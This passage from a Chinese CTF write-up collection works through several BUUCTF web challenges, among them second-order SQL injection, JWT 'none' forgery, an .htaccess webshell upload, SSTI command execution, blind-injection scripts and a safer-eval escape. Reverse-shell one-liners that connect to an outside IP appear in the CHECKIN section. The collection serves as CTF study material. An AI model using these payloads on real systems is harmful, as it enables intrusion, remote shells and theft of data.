  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

$secret = bin2hex(random_bytes(64));
if (isset($_POST['guess'])) {
  $guess = (string) $_POST['guess'];
  if (hash_equals($secret, $guess)) {
    $message = 'Congratulations! The flag is: ' . FLAG;
  } else {
    $message = 'Wrong.';
  }
}
?>
<!doctype html>
<html lang="en">
  <head>
    <meta charset="utf-8">
    <title>Can you guess it?</title>
  </head>
  <body>
    <h1>Can you guess it?</h1>
    <p>If your guess is correct, I'll give you the flag.</p>
    <p><a href="?source">Source</a></p>
    <hr>
<?php if (isset($message)) { ?>
    <p><?= $message ?></p>
<?php } ?>
    <form action="index.php" method="POST">
      <input type="text" name="guess">
      <input type="submit">
    </form>
  </body>
</html>

其中满足条件的一个方法是我们 post 传入的 guess 和随机数相同能得到 flag

使用的对比是hash_equals函数，而不是===，hash_equals相较于===，它对比使用的时间是固定的，而===是逐位比较，这个函数可以防止攻击者通过时间来猜测字符串长度

说明这个猜测 secret 的值是不能实现的。

那么我们的利用点就在上面的代码

<?php
include 'config.php'; // FLAG is defined in config.php

if (preg_match('/config\.php\/*$/i', $_SERVER['PHP_SELF'])) {
  exit("I don't know what you are thinking, but I won't let you read it :)");
}

if (isset($_GET['source'])) {
  highlight_file(basename($_SERVER['PHP_SELF']));
  exit();
}

然后前面可以知道 flag 在 config.php 中。我们直接访问。config.php

发现访问 config.php 看不到回显。

$_SERVER['PHP_SELF'] 返回的是当前正在执行的脚本的名字

然后会进行一个正则匹配。匹配 $_SERVER['PHP_SELF'] 的返回值的结尾是不是 /config.php/ 如果是就退出（/i 大小不敏感

后面的显示内容用的是 highlight_file(basename($_SERVER['PHP_SELF'])); 利用了 basename

basename则可以返回路径中的文件名部分

假如路径是/index.php/config.php

那么浏览器的解析结果都是index.php

而basename会返回config.php

对于 basename 的绕过 https://bugs.php.net/bug.php?id=62119

可以利用不可显示字符绕过 basename

可以使用 /index.php/config.php/蒋?source 蒋这个位子可以为中文也可以是不可显示ascii字符的url

[CISCN2019 华北赛区 Day1 Web5]CyberPunk

2020.12.9

考点

Sql 二次注入

报错注入带出flag

sql root 权限 flag 一般为系统中的文件。

做题步骤

测试功能没啥特别的
查看源码发现一个

猜测伪协议。

php://filter/read=convert.base64-encode/resource=index.php

读取所有文件并base64 解密

将 index.php change.php search.php delete.php

然后进行代码审计

发现基本都是数据库操作。

然后发现是引入了 config.php 我们去读里面的内容

通过这个 config.php 的内容

<?php

ini_set("open_basedir", getcwd() . ":/etc:/tmp");

$DATABASE = array(

    "host" => "127.0.0.1",
    "username" => "root",
    "password" => "root",
    "dbname" =>"ctfusers"
);

$db = new mysqli($DATABASE['host'],$DATABASE['username'],$DATABASE['password'],$DATABASE['dbname']);

得到我们的数据库权限是 root （一般情况下如果权限为 root 说明我们的flag 应该是系统文件。

然后我们发现我们的代码sql 语句中。

confirm.php 中

<?php

require_once "config.php";
//var_dump($_POST);

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = $_POST["address"];
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if($fetch->num_rows>0) {
        $msg = $user_name."已提交订单";
    }else{
        $sql = "insert into `user` ( `user_name`, `address`, `phone`) values( ?, ?, ?)";
        $re = $db->prepare($sql);
        $re->bind_param("sss", $user_name, $address, $phone);
        $re = $re->execute();
        if(!$re) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单提交成功";
    }
} else {
    $msg = "信息不全";
}

会对我们的 user_name 和 phone 进行比较判断是否存在 sql 注入代码。但是并没有对 address 的内容进行匹配

change.php 中

<?php

require_once "config.php";

if(!empty($_POST["user_name"]) && !empty($_POST["address"]) && !empty($_POST["phone"]))
{
    $msg = '';
    $pattern = '/select|insert|update|delete|and|or|join|like|regexp|where|union|into|load_file|outfile/i';
    $user_name = $_POST["user_name"];
    $address = addslashes($_POST["address"]);
    $phone = $_POST["phone"];
    if (preg_match($pattern,$user_name) || preg_match($pattern,$phone)){
        $msg = 'no sql inject!';
    }else{
        $sql = "select * from `user` where `user_name`='{$user_name}' and `phone`='{$phone}'";
        $fetch = $db->query($sql);
    }

    if (isset($fetch) && $fetch->num_rows>0){
        $row = $fetch->fetch_assoc();
        $sql = "update `user` set `address`='".$address."', `old_address`='".$row['address']."' where `user_id`=".$row['user_id'];
        $result = $db->query($sql);
        if(!$result) {
            echo 'error';
            print_r($db->error);
            exit;
        }
        $msg = "订单修改成功";
    } else {
        $msg = "未找到订单!";
    }
}else {
    $msg = "信息不全";
}

如果我们这里会保存我们原本存储的 address 。且也是没有对我们的 address 进行一个比较处理。

说明如果我们输入的 address 存在一个 sql 语句在执行 change.php 的内容的时候会调用之前的 address的内容。从而产生一个二次注入。

我们直接在创建的时候 address 为如下 payload 然后再去执行修改订单就行

1 2	1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),1,20)),0x7e),1)# 1' where user_id=updatexml(1,concat(0x7e,(select substr(load_file('/flag.txt'),20,50)),0x7e),1)#

[HITCON 2017]SSRFme

2020.12.10

考点

GET如何来执行系统命令

要执行的命令先前必须要有以命令为文件名的文件存在

https://lorexxar.cn/2017/11/10/hitcon2017-writeup/#ssrfme

https://mayi077.gitee.io/2020/03/25/HITCON-2017-SSRFme/

漏洞修复是在 file.pm 中 open(my $fh,'<', $path) or return new 加一个 < 原本的漏洞 open(my $fh, $path) or return new

做题步骤

查看代码

<?php
    if (isset($_SERVER['HTTP_X_FORWARDED_FOR'])) {
        $http_x_headers = explode(',', $_SERVER['HTTP_X_FORWARDED_FOR']);
        $_SERVER['REMOTE_ADDR'] = $http_x_headers[0];
    }

    echo $_SERVER["REMOTE_ADDR"];

    $sandbox = "sandbox/" . md5("orange" . $_SERVER["REMOTE_ADDR"]);
    @mkdir($sandbox);
    @chdir($sandbox);

    $data = shell_exec("GET " . escapeshellarg($_GET["url"]));
    $info = pathinfo($_GET["filename"]);
    $dir  = str_replace(".", "", basename($info["dirname"]));
    @mkdir($dir);
    @chdir($dir);
    @file_put_contents(basename($info["basename"]), $data);
    highlight_file(__FILE__);

创建一个 sandbox 名字为 md5(orange+ip)

根据 shell_exec 调用 GET 命令取得 url 参数的值。

然后更具 filename pathinfo函数以数组的形式返回文件路径的信息。

GET命令是通过perl执行的；perl在open当中可以执行命令；GET+file协议触发perl+open

测试

1 2	/?url=/etc/passwd&filename=1 /sandbox/0d9bed434b119f30d801214a14a2e3fb/1

实现命令调用

这样可以实现文件读取

要实现调用 /readflag

我们要用到 GET 的 file 协议 和 bsah -c

1 2	/?url=file:bash%20-c%20/readflag\|&filename=1 /sandbox/0d9bed434b119f30d801214a14a2e3fb/1

[V&N2020 公开赛]HappyCTFd

2020.12.11

考点

是一个 ctfd 漏洞找到下面漏洞

CVE-2020-7245 CTFd v2.0.0 – v2.2.2 account takeover

https://www.colabug.com/2020/0204/6940556/amp/

使用的用户名是从post数据中直接得到的name值，然而入库时却将这个name值做了 strip
处理去掉首尾的空字符。因此我们只要注册一个首位加空格的用户名即可绕过用户名不能重复的限制。

利用修改密码进行修改。

做题步骤

利用添加空格绕过限制来注册一个与受害者用户名相同的账号
生成忘记密码链接发送到自己的邮箱
将自己的账号的用户名改成与被攻击者不相同的用户名
用邮箱中收到的链接更改密码即可。

这道题需要用到 buu 的内置邮箱

http://mail.buuoj.cn/admin/ui/user/settings 注册

http://mail.buuoj.cn/?_task=mail&_mbox=INBOX 访问接受修改密码的邮箱

下载得到 flag

[HFCTF2020]EasyLogin

2020.12.11

考点

Koa 目录结构

Jwt 伪造

https://www.yuque.com/u390550/hsy6gq/uo89e5

做题步骤

打开网站不能注册 admin 账户。

注册后有个 getflag

查看源码

<html>
  <head>
  <title>Home</title>
  <link href="/static/css/bootstrap.min.css" rel="stylesheet" id="bootstrap-css"/>
  <link href="/static/css/app.css" rel="stylesheet"/>
  <script src="/static/js/bootstrap.min.js"></script>
  <script src="/static/js/jquery.min.js"></script>
  </head>
  <body>
  <div class="wrapper fadeInDown">
  <div id="formContent">
  <div class="fadeIn first">
  <h2>Welcome  admin</h2>
  </div>
  <form>
  <input class="fadeIn second" type="text" id="flag" name="flag" placeholder="The flag will be here..."/>
  <br/><br/>
  <input class="fadeIn third" type="button" value="Get Flag" onclick="getflag()"/>
  </form>
  <div id="formFooter"><a class="underlineHover" onclick="logout()">退出当前账号</a>
  </div></div></div>
  <script src="/static/js/app.js"></script>
  </body>
</html>

有个 app.js

/**
 *  或许该用 koa-static 来处理静态文件
 *  路径该怎么配置？不管了先填个根目录XD
 */

function login() {
    const username = $("#username").val();
    const password = $("#password").val();
    const token = sessionStorage.getItem("token");
    $.post("/api/login", {username, password, authorization:token})
        .done(function(data) {
            const {status} = data;
            if(status) {
                document.location = "/home";
            }
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function register() {
    const username = $("#username").val();
    const password = $("#password").val();
    $.post("/api/register", {username, password})
        .done(function(data) {
            const { token } = data;
            sessionStorage.setItem('token', token);
            document.location = "/login";
        })
        .fail(function(xhr, textStatus, errorThrown) {
            alert(xhr.responseJSON.message);
        });
}

function logout() {
    $.get('/api/logout').done(function(data) {
        const {status} = data;
        if(status) {
            document.location = '/login';
        }
    });
}

function getflag() {
    $.get('/api/flag').done(function(data) {
        const {flag} = data;
        $("#username").val(flag);
    }).fail(function(xhr, textStatus, errorThrown) {
        alert(xhr.responseJSON.message);
    });
}

根据这个 api.js 利用的 koa-static 谷歌发现是一个 Node.js 的中间件

然后就是简单的函数调用等。

利用 dirsearch 扫描

访问 app.js

得到

const Koa = require('koa');
const bodyParser = require('koa-bodyparser');
const session = require('koa-session');
const static = require('koa-static');
const views = require('koa-views');

const crypto = require('crypto');
const { resolve } = require('path');

const rest = require('./rest');
const controller = require('./controller');

const PORT = 3000;
const app = new Koa();

app.keys = [crypto.randomBytes(16).toString('hex')];
global.secrets = [];

app.use(static(resolve(__dirname, '.')));

app.use(views(resolve(__dirname, './views'), {
  extension: 'pug'
}));

app.use(session({key: 'sses:aok', maxAge: 86400000}, app));

// parse request body:
app.use(bodyParser());

// prepare restful service
app.use(rest.restify());

// add controllers:
app.use(controller());

app.listen(PORT);
console.log(`app started at port ${PORT}...`);

然后没有了思路

看了wp

知道有个 /controllers/api.js 目录

得到对应源码

const crypto = require('crypto');
const fs = require('fs')
const jwt = require('jsonwebtoken')

const APIError = require('../rest').APIError;

module.exports = {
    'POST /api/register': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || username === 'admin'){
            throw new APIError('register error', 'wrong username');
        }

        if(global.secrets.length > 100000) {
            global.secrets = [];
        }

        const secret = crypto.randomBytes(18).toString('hex');
        const secretid = global.secrets.length;
        global.secrets.push(secret)

        const token = jwt.sign({secretid, username, password}, secret, {algorithm: 'HS256'});

        ctx.rest({
            token: token
        });

        await next();
    },

    'POST /api/login': async (ctx, next) => {
        const {username, password} = ctx.request.body;

        if(!username || !password) {
            throw new APIError('login error', 'username or password is necessary');
        }

        const token = ctx.header.authorization || ctx.request.body.authorization || ctx.request.query.authorization;

        const sid = JSON.parse(Buffer.from(token.split('.')[1], 'base64').toString()).secretid;

        console.log(sid)

        if(sid === undefined || sid === null || !(sid < global.secrets.length && sid >= 0)) {
            throw new APIError('login error', 'no such secret id');
        }

        const secret = global.secrets[sid];

        const user = jwt.verify(token, secret, {algorithm: 'HS256'});

        const status = username === user.username && password === user.password;

        if(status) {
            ctx.session.username = username;
        }

        ctx.rest({
            status
        });

        await next();
    },
wwwwwwwww
    'GET /api/flag': async (ctx, next) => {
        if(ctx.session.username !== 'admin'){
            throw new APIError('permission error', 'permission denied');
        }

        const flag = fs.readFileSync('/flag').toString();
        ctx.rest({
            flag
        });

        await next();
    },

    'GET /api/logout': async (ctx, next) => {
        ctx.session.username = null;
        ctx.rest({
            status: true
        })
        await next();
    }
};

这才是关键代码。发现需要我们的 username 为 admin （利用session 来验证，如果是 admin 才能得到 flag

然后发现我们的 token 都是利用的 jwt

且 jwt 是登陆的时候产生的。抓包发现会向服务器传一个 authorization

利用 Jwt 解密

发现就是我们传入的 username password

JWT 存在几种攻击手段，这个题利用的是将加密方式改为’none’ 的那种

签名算法确保恶意用户在传输过程中不会修改JWT。但是标题中的alg字段可以更改为none。一些JWT库支持无算法，即没有签名算法。当alg为none时，后端将不执行签名验证。将alg更改为none后，从JWT中删除签名数据（仅标题+’.’+ payload +’.’）并将其提交给服务器。

exp

import jwt
token = jwt.encode(
{
  "secretid": [],
  "username": "admin",
  "password": "123456",
  "iat": 1607699433
},
algorithm="none",key=""
).decode(encoding='utf-8')

print(token)
# eyJ0eXAiOiJKV1QiLCJhbGciOiJub25lIn0.eyJzZWNyZXRpZCI6W10sInVzZXJuYW1lIjoiYWRtaW4iLCJwYXNzd29yZCI6IjEyMzQ1NiIsImlhdCI6MTYwNzY5OTQzM30.

修改对应的内容后登录发现能成功

添加对应的返回值

sses:aok.sig sses:aok

登录自己的账号

然后修改里面的 cookie

然后点击 GET FLAG

抓包

得到 flag

[SUCTF 2019]EasyWeb

2020.12.12

考点

无符号 get shell

文件上传

.htaccess 文件上传

php_value auto_append_file

绕过 php <? 利用 base64 绕过

https://www.wh1teze.top/articles/2020/02/04/1580806413437.html

绕过 open_basedir

做题步骤

得到代码

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

$hhh = @$_GET['_'];

if (!$hhh){
    highlight_file(__FILE__);
}

if(strlen($hhh)>18){
    die('One inch long, one inch strong!');
}

if ( preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', $hhh) )
    die('Try something else!');

$character_type = count_chars($hhh, 3);
if(strlen($character_type)>12) die("Almost there!");

eval($hhh);
?>

有个命令执行可以利用无符号get shell

可以利用异或构造 $_GET[‘a’] 这样的结构。

${_GET}{a}();

于是我们先知道他只能使用哪些字符串

<?php
for($a = 0; $a < 256; $a++){
    if (!preg_match('/[\x00- 0-9A-Za-z\'"\`~_&.,|=[\x7F]+/i', chr($a))){
        echo chr($a)." ";
    }
}
# 可显示 ! # $ % ( ) * + - / : ; < > ? @ \ ] ^ { }  还有不在 ascii 范围的。不可显示

因为这里过滤了取反。所以我还能使用异或来构造

<?php
$payload = '';
$x = '_GET';
for($i = 0; $i < 4; $i++){
    $payload .= "%".dechex(ord($x[$i]^chr(0xfe)));
}
echo("%ff%ff%ff%ff^".$payload);
# %ff%ff%ff%ff^%a0%b8%ba%ab
# ?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=phpinfo

执行 phpinfo

然后直接查看 phpinfo 就能得到 flag（可能是非预期

预期解

然后根据源码。我们知道这里我们要调用 get_the_flag 函数

<?php
function get_the_flag(){
    // webadmin will remove your upload file every 20 min!!!! 
    $userdir = "upload/tmp_".md5($_SERVER['REMOTE_ADDR']);
    if(!file_exists($userdir)){
    mkdir($userdir);
    }
    if(!empty($_FILES["file"])){
        $tmp_name = $_FILES["file"]["tmp_name"];
        $name = $_FILES["file"]["name"];
        $extension = substr($name, strrpos($name,".")+1);
    if(preg_match("/ph/i",$extension)) die("^_^"); 
        if(mb_strpos(file_get_contents($tmp_name), '<?')!==False) die("^_^");
    if(!exif_imagetype($tmp_name)) die("^_^"); 
        $path= $userdir."/".$name;
        @move_uploaded_file($tmp_name, $path);
        print_r($path);
    }
}

这个函数会有一个目录 upload/tmp_md5(ip) 然后会上传一个 file 文件。这个文件的文件名不能存在 ph 字符和 i 字符

所以这里我们不能上传 php 文件也不能传参 .user.ini

而且检测了我们的文件内容里面不能有 <? (这个可以利用<script language='php'> 实现绕过只能是 php5 因为题目为 php7 所以不能使用 <script> 进行绕过 )

且利用了 exif_imagetype 函数。所以我们的上传文件必须要伪造文件头。

方法一
#define width 1337
#define height 1337
方法二
\x00\x00\x8a\x39\x8a\x39    #wbmp文件

文件上传绕过。于是我们可以知道。我们只能上传内容没有 <? 的文件名不包含 ph 和 i 的

这个时候我们知道的就只有 .htaccess 这个配置文件。从而能够解析其他后缀名的文件。且利用 .htaccess

对弈 .htaccess 的 exif_imagetype() 函数绕过中，因为 .htaccess 是配置文件所以文件头不能用配置文件不能识别的字符。所以只能用上面的 方法一 方法二 不能使用 GIF 这样的方式绕过。

然后是绕过 <? 过滤因为不能有这个也不能使用 <script language='php'> 所以我们可以先传一个一句话木马的base64 的文件。然后在利用 .htaccess 的伪协议对一句话的base64 解密并加到文件中。从而来实现写入 <?php 这样的php 内容的头

查看 wp 学习的脚本

import requests
import base64

url = "http://d64e865c-d5ba-45f1-b9ec-e4fb80ae2ccf.node3.buuoj.cn/?_=${%ff%ff%ff%ff^%a0%b8%ba%ab}{%ff}();&%ff=get_the_flag"


htaccess = b"""\x00\x00\x8a\x39\x8a\x39
AddType application/x-httpd-php .ss
php_value auto_append_file "php://filter/convert.base64-decode/resource=/var/www/html/upload/tmp_c41893938531041badacfc22febe3abd/shell.ss"

"""

shell = b"\x00\x00\x8a\x39\x8a\x39"+b"00"+ base64.b64encode(b"<?php eval($_GET['s']);?>")

files = [('file',('.htaccess',htaccess,'image/jpeg'))]

data = {"upload":"Submit"}


r = requests.post(url=url, data=data, files=files)
print(r.text)


files = [('file',('shell.ss',shell,'image/jpeg'))]
r = requests.post(url=url, data=data, files=files)
print(r.text)

上传成功

执行能够查看 phpinfo();

然后程序设置了

说明我们不能去查看其它目录

直接读取 / 目录文件不能得到

但是可以绕过

https://xz.aliyun.com/t/4720

还有一点 open_basedir对系统函数并没有做相关的限制，我们用系统函数可以绕过。

还可以利用先知文章的方法进行绕过

s=chdir('xxx');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(scandir('/'));

继续查看。

s=chdir('xxx');ini_set('open_basedir','..');chdir('..');chdir('..');chdir('..');chdir('..');ini_set('open_basedir','/');var_dump(file_get_contents('/THis_Is_tHe_F14g'));

对应的 THis_Is_tHe_F14g 文件

得到 flag

[CSCCTF 2019 Qual]FlaskLight

2020.12.12

考点

有 ssti 注入

做题步骤

知道是 flask

SSTI cheatsheet workflow

首先根据源码知道要 get传参 search

/?search={{2*2}}

页面返回了 4 说明存在 ssti 注入

先查看有哪些类

1	{{''.__class__.__mro__[2].__subclasses__()}}

得到很多的类

发现里面没有 __init__ 这样的

所以一般的 ssti 注入的不能被使用了

查看 wp https://yanmymickey.github.io/2020/04/15/CTFwp/%5BCSCCTF%202019%20Qual%5DFlaskLight/

知道还可以使用 subprocess.Popen 执行命令

import requests
import re
import html
import time

index = 0
for i in range(1, 1000):
    try:
        url = "http://69e8f4b5-d170-471b-95b7-0f8b35f0b66d.node3.buuoj.cn/?search={{''.__class__.__mro__[2].__subclasses__()[" + str(i) + "]}}"
        r = requests.get(url)
        res = re.findall("<h2>You searched for:<\/h2>\W+<h3>(.*)<\/h3>", r.text)
        time.sleep(0.1)
        # print(res)
        # print(r.text)
        res = html.unescape(res[0])
        print(str(i) + " | " + res)
        if "subprocess.Popen" in res:
            index = i
            break
    except:
        continue
print("indexo of subprocess.Popen:" + str(index))

找到这个函数的索引为 258

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('ls /flasklight',shell=True,stdout=-1).communicate()[0].strip()}}

?search={{''.__class__.__mro__[2].__subclasses__()[258]('cat /flasklight/coomme_geeeett_youur_flek',shell=True,stdout=-1).communicate()[0].strip()}}

[GYCTF2020]Ezsqli

2020.12.13

考点

sql 盲注

information_schema 被禁用 https://www.anquanke.com/post/id/193512

https://nosec.org/home/detail/3830.html

1 2	select group_concat(table_name) from sys.schema_table_statistics_with_buffer where table_schema=database() select group_concat(table_name) from sys.x$schema_flattened_keys

无列名爆破

https://ama666.cn/2020/06/03/%E6%97%A0%E5%88%97%E5%90%8D%E7%9B%B2%E6%B3%A8/

sql 大小写不敏感。

做题步骤

测试

输入 1 正常回显

输入 1^1 报错

输入 1^1^1 正常

因为无其他回显，可以直接盲注

依次得到数据库名表名字段名

数据库

表名

因为禁用了 information 所以只能无列名爆破

'1^((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh))'.format(tmp)

最后利用payload

# coding:utf-8 
import requests
import time
url='http://c679a06a-81e4-44a6-823e-aa066504dc1d.node3.buuoj.cn'
flag=''

def str2hex(s): #十六进制转换 fl ==> 0x666c
    res = ''
    for i in s:
        res += hex(ord(i)).replace('0x','')
    res = '0x' + res
    return res

for i in range(50):
    a = 32
    b = 128
    mid = (a+b)//2
    while(a<b):
        tmp = str2hex(flag + chr(mid+1))
        # payload = '0^(ascii(substr(database(),{},1))>{})'.format(i,mid) # 爆破表
        # payload = '0^(ascii(substr((select group_concat(table_name) from sys.x$schema_flattened_keys),{},1))>{})'.format(i,mid)
        payload = '1^((select 1,{})>(select * from f1ag_1s_h3r3_hhhhh))'.format(tmp)
        data = {
            'id':payload
        }
        re = requests.post(url=url,data=data)
        # print(re.text)
        if 'Nu1L' in re.text:
            a = mid + 1
        else:
            b = mid
        mid = (a+b)//2
    time.sleep(0.2)

    if (mid==32|mid==128):
        break
    flag +=chr(mid)
    print(flag)
print(flag.lower())

[V&N2020 公开赛]CHECKIN

2020.12.13

考点

反弹shell

https://mayi077.gitee.io/2020/03/27/%E5%8F%8D%E5%BC%B9shell-payload%E6%80%BB%E7%BB%93/

做题步骤

打开网页给出源码

from flask import Flask, request
import os
app = Flask(__name__)

flag_file = open("flag.txt", "r")
# flag = flag_file.read()
# flag_file.close()
#
# @app.route('/flag')
# def flag():
#     return flag
## want flag? naive!

# You will never find the thing you want:) I think
@app.route('/shell')
def shell():
    os.system("rm -f flag.txt")
    exec_cmd = request.args.get('c')
    os.system(exec_cmd)
    return "1"

@app.route('/')
def source():
    return open("app.py","r").read()

if __name__ == "__main__":
    app.run(host='0.0.0.0')

在开始的时候打开了 flag.txt 只有一个 /shell 路由。根据这个路由知道在进入的时候会先删除我们的 flag.txt

然后根据传递的参数 c 来执行一条系统命令

首先想到的利用反弹shell 获得权限利用网站 http://www.nclisten.cn/

尝试

nc -e /bin/sh 129.226.62.10 44137 (x) 不能

perl -e 'use Socket;$i="129.226.62.10";$p=44137;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};' (x) 不能

bash -i >& /dev/tcp/129.226.62.10/44137 0>&1 (x) 不能

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("129.226.62.10",44137));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'  (√) 获得权限

因为 flag.txt 已经被删了

百度发现一般是不能恢复的

然后因为源码是打开了文件的 flag_file = open("flag.txt", "r")

在 linux 系统中如果一个程序打开了一个文件没有关闭，即便从外部删除之后，在 /proc 这个进程的 pid 目录下的 fd 文件描述符目录下还是会有这个文件的 fd，通过这个我们即可得到被删除文件的内容。

利用 cat /proc/*/fd/* 可以查看我们的打开文件的描述符

[GKCTF2020]EZ三剑客-EzNode

2020.12.13

考点

做题步骤

打开网站可以查看源代码和版本信息

source

const express = require('express');
const bodyParser = require('body-parser');

const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

const fs = require('fs');

const app = express();


app.use(bodyParser.urlencoded({ extended: false }));
app.use(bodyParser.json());

// 2020.1/WORKER2 老板说为了后期方便优化
app.use((req, res, next) => {
  if (req.path === '/eval') {
    let delay = 60 * 1000;
    console.log(delay);
    if (Number.isInteger(parseInt(req.query.delay))) {
      delay = Math.max(delay, parseInt(req.query.delay));
    }
    const t = setTimeout(() => next(), delay);
    // 2020.1/WORKER3 老板说让我优化一下速度，我就直接这样写了，其他人写了啥关我p事
    setTimeout(() => {
      clearTimeout(t);
      console.log('timeout');
      try {
        res.send('Timeout!');
      } catch (e) {

      }
    }, 1000);
  } else {
    next();
  }
});

app.post('/eval', function (req, res) {
  let response = '';
  if (req.body.e) {
    try {
      response = saferEval(req.body.e);
    } catch (e) {
      response = 'Wrong Wrong Wrong!!!!';
    }
  }
  res.send(String(response));
});

// 2019.10/WORKER1 老板娘说她要看到我们的源代码，用行数计算KPI
app.get('/source', function (req, res) {
  res.set('Content-Type', 'text/javascript;charset=utf-8');
  res.send(fs.readFileSync('./index.js'));
});

// 2019.12/WORKER3 为了方便我自己查看版本，加上这个接口
app.get('/version', function (req, res) {
  res.set('Content-Type', 'text/json;charset=utf-8');
  res.send(fs.readFileSync('./package.json'));
});

app.get('/', function (req, res) {
  res.set('Content-Type', 'text/html;charset=utf-8');
  res.send(fs.readFileSync('./index.html'))
})

app.listen(80, '0.0.0.0', () => {
  console.log('Start listening')
});

版本

{
  "name": "src",
  "version": "1.0.0",
  "main": "index.js",
  "license": "MIT",
  "dependencies": {
    "body-parser": "1.19.0",
    "express": "4.17.1",
    "safer-eval": "1.3.6"
  }
}

根据 index.js 猜测

1	const saferEval = require('safer-eval'); // 2019.7/WORKER1 找到一个很棒的库

可能和这个库有关。

且这个库的版本为

1	"safer-eval": "1.3.6"

找下这个库的历史漏洞

https://github.com/commenthol/safer-eval/issues/10

payload

(function () {

const process = clearImmediate.constructor("return process;")();

return process.mainModule.require("child_process").execSync("cat /flag").toString()})()

setTimeout 函数

会先根据我们的 delay 利用 setTimeout 设置延时时间默认为 60 * 1000

然后发现在后面还有一个 setTimeout 在 1000 之后清除上面的 setTimeout 类

setTimeout(() => next(), delay); 根据我们的输入 delay 和 60*1000 比较去大值做为参数

根据这个函数认识，我们知道只要我们设置的数字大于 2147483647 就能让 delay 设置为1 实验 ()=>next() 的调用。

我们只需要传递 delay=2147483648 就能实现

执行命令并看到 flag

绕过cat 打开flag

[BJDCTF 2nd]文件探测

2020.12.14

考点

ssrf

伪协议读文件

格式化字符串

做题步骤

根据名知道这个应该考察的 ssrf

网页前端有注释

没什么特别的

进行目录扫描也没看到什么特别的

抓包看看

发现有个 hint home.php

得到一个新网页

根据 url 推测这里可以使用 php 伪协议读文件。

home.php?file=system 利用伪协议读文件

读取home.php 并base64 解密

<?php

setcookie("y1ng", sha1(md5('y1ng')), time() + 3600);
setcookie('your_ip_address', md5($_SERVER['REMOTE_ADDR']), time()+3600);

if(isset($_GET['file'])){
    if (preg_match("/\^|\~|&|\|/", $_GET['file'])) {
        die("forbidden");
    }

    if(preg_match("/.?f.?l.?a.?g.?/i", $_GET['file'])){
        die("not now!");
    }

    if(preg_match("/.?a.?d.?m.?i.?n.?/i", $_GET['file'])){
        die("You! are! not! my! admin!");
    }

    if(preg_match("/^home$/i", $_GET['file'])){
        die("禁止套娃");
    }

    else{
        if(preg_match("/home$/i", $_GET['file']) or preg_match("/system$/i", $_GET['file'])){
            $file = $_GET['file'].".php";
        }
        else{
            $file = $_GET['file'].".fxxkyou!";
        }
        echo "现在访问的是 ".$file . "<br>";
        require $file;
    }
} else {
    echo "<script>location.href='./home.php?file=system'</script>";
}

读取 system.php

<?php
error_reporting(0);
if (!isset($_COOKIE['y1ng']) || $_COOKIE['y1ng'] !== sha1(md5('y1ng'))){
    echo "<script>alert('why you are here!');alert('fxck your scanner');alert('fxck you! get out!');</script>";
    header("Refresh:0.1;url=index.php");
    die;
}

$str2 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;url invalid<br>~$ ';
$str3 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;damn hacker!<br>~$ ';
$str4 = '&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Error:&nbsp;&nbsp;request method error<br>~$ ';

?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <title>File Detector</title>

    <link rel="stylesheet" type="text/css" href="css/normalize.css" />
    <link rel="stylesheet" type="text/css" href="css/demo.css" />

    <link rel="stylesheet" type="text/css" href="css/component.css" />

    <script src="js/modernizr.custom.js"></script>

</head>
<body>
<section>
    <form id="theForm" class="simform" autocomplete="off" action="system.php" method="post">
        <div class="simform-inner">
            <span><p><center>File Detector</center></p></span>
            <ol class="questions">
                <li>
                    <span><label for="q1">你知道目录下都有什么文件吗?</label></span>
                    <input id="q1" name="q1" type="text"/>
                </li>
                <li>
